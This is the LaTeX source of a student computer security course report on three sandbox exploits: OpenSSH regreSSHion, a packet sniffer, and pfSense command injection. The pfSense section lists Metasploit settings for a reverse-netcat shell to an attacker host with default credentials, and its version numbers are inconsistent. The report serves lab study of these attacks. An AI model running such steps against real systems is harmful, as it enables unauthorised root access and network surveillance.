\documentclass[12pt]{article}

% Packages for styling and formatting
\usepackage[a4paper, margin=1in]{geometry}
\usepackage{graphicx} % For including images
\usepackage{amsmath}  % For mathematical formulas
\usepackage{hyperref} % For clickable links in the document
\usepackage{caption}  % For customizing captions
\usepackage{fancyhdr} % For custom headers/footers

% Header and footer
\pagestyle{fancy}
\fancyhf{}
\fancyhead[L]{Project Report}
\fancyhead[R]{\thepage}
\fancyfoot[R]{Date: \today}

% Title Page
\title{Project Step 3 Report}
\author{Group: The Group \\ Members: Andrew Bracken, Gavin Holliday, Logan Lay \\ CS 4371: Computer Security \\ Dr. Randy Klepetko}
\date{\today}

\begin{document}

% Title Page
\maketitle
\newpage

% Table of Contents
\tableofcontents
\newpage

% Introduction
\section{Introduction}
In this project step, each member researched individual exploits to run in our sandbox. Gavin Holliday documented the pfsense exploitation, Logan Lay documented the network sniffer exploitation, Andrew Bracken documented the RegreSSHion exploitation and made the LaTex documentation. 

% Exploits
\section{Exploits}
\subsection{Exploit I: RegreSSHion}
Research: \\
    Used: True \\
    
    Severity: 9/10 \\
    
    Target: Ubuntu machin, OpenSSH v8.5p1-9.7p1 \\
    
    Reference: \href{https://nvd.nist.gov/vuln/detail/cve-2024-6387}{CVE-2024-6387} \\

    Outcome: Remote code access

    Implementation Complexity: 2/10 \\

Preparations: \\
    Steps:\\
    \begin{enumerate}
        \item Confirm that OpenSSH version of the target machine falls within the exploits range. \\
        \begin{figure}[h]
            \centering
            \includegraphics[width=0.5\linewidth]{E1_1.JPG}
        \end{figure}
        \item Download proof of concept onto attacking machine \href{https://github.com/d0rb/CVE-2024-6387}{POC} \\

        \item Locate glibcbase location on target machine \\

        \item Adjust PoC parameters \\

        \item Run the exploit \\

        \item Adjust input parameters until the race condition is satisfied \\
        \begin{figure}[h]
            \centering
            \includegraphics[width=0.5\linewidth]{E1_2.JPG}
        \end{figure}
        
    \end{enumerate}

Exploitation:\\
The PoC code exploits a vulnerability in OpenSSH versions 8.5p1-9.7p1 that allows remote code execution on glibc-based Linux systems. This is due to a race condition in sshd, where asynchronous signal handling invokes functions that are not safe to use within signal handlers, such as syslog(). The code continuously attempts to gain access to the target machine, adjusting the timing slightly after each failed attempt until it succeeds. 


\subsection{Exploit II: Packet Sniffer}
Research: \\

Severity: 4/10 \\

Target: Ubuntu machine \\

Reference: \url{https://www.thecodingforums.com/threads/c-packet-sniffing.975603/} \\

Outcome: Network surveillance  \\

Implementation Complexity: 1/10 \\

Preparation: \\

Steps: \\
\begin{enumerate}
    \item Get Target’s IP address \\

    \item Create sniffer exploitation program \\

    \item Download libcap library onto the Linux machine \\

    \item Download exploitation program onto Linux machine \\

    \item Run program on Linux machine \\

    \item Observe Network activity and packet collection of Target \\
\end{enumerate}

Code: \\
\begin{figure}[h]
    \centering
    \includegraphics[width=0.5\linewidth]{E2_1.JPG}
\end{figure}


Exploitation:  \\ 
\begin{figure}[h]
    \centering
    \includegraphics[width=0.5\linewidth]{E2_2.JPG}
    \caption{Here we ssh into the server that has the sniffer running on its ethernet connection.  }
\end{figure}


\begin{figure}[h]
    \centering
    \includegraphics[width=0.5\linewidth]{E2_3.JPG}
    \caption{Here reflects the ssh packet sent to the server 192.168.100.103, from 192.168.200.100}
\end{figure}

If the Machines were connected via Wi-Fi instead of Ethernet it’s possible this exploitation could be used to sniff packets from other machines but currently on our machines it only works to sniff out different accounts using the same machine. 


\subsection{Exploit III: pfSense v2.7.0 - OS Command Injection}
Research: \\

Severity: 9/10 \\

Target: pfSense web application \\

Reference: \href{https://www.exploit-db.com/exploits/51608}{CVE: 2023-27253}\\

Outcome: root access \\

Implementation Complexity: 3/10 \\

Note: This exploit has been patched, but versions < v7.0.0 are still vulnerable. \\

Preparation: \\

First, the vulnerable version of pfSense (v6.0.0) had to be installed. This version was patched in June, 2023. This is still possible to exploit, and our downloading of the deprecated version is justified based on the fact of when was the last time you updated your router? It is not often a person updates their router, so there could be people still running this version. \\

Next is the actual exploitation steps: 
\begin{enumerate}
    \item Download Metasploit .rb file from the reference 

    \item Save file in Metasploit’s modules 

    \item Reload Metasploit modules 

    \item Gain access to the pfSense web application (through password cracking) 

    \item Use the downloaded module 
    
    \item Set the environment variables:
\end{enumerate}
     - RHOSTS target_ip.  \\
     - set RPORT 80 (or use nmap to see open ports)\\
     - set USERNAME admin (cracked username) \\
     - set PASSWORD pfsense (cracked password) \\
     - set PAYLOAD cmd/unix/reverse_netcat  \\
     - set LHOST <attacker_ip> (kali machine’s port) \\
     - set LPORT <listening_port> (any valid)\\

Run exploit until shell opened. \\

The default pfSense username and password were used, so there was no need to crack them \\

Exploitation: \\
    Here is the full exploitation flow with failures and finally success.  
    \begin{figure}[h]
        \centering
        \includegraphics[width=0.3\linewidth]{E3_1.JPG}
    \end{figure}
    \begin{figure}[h]
        \centering
        \includegraphics[width=0.3\linewidth]{E3_11.JPG}
    \end{figure}
    \begin{figure}[h]
        \centering
        \includegraphics[width=0.3\linewidth]{E3_12.JPG}
    \end{figure}

As you can see, I was able to gain root access to the pfSense router’s operating system and open a shell terminal. I then proceeded to show the directory, user, and the list of files. I successfully gained root access. From here, I can change firewall settings, manipulate files, steal data, or shut the system down. I can pivot from this and look for vulnerable devices connected to the router. \\



% Conclusion
\section{Conclusion}
In this project step, we dug for exploits that could be used against the systems in our sandbox. Everyone individually came up with at least one working exploit that was documented in the previous section. Everything went smoothly, and no pitfalls were encountered. 
\end{document}
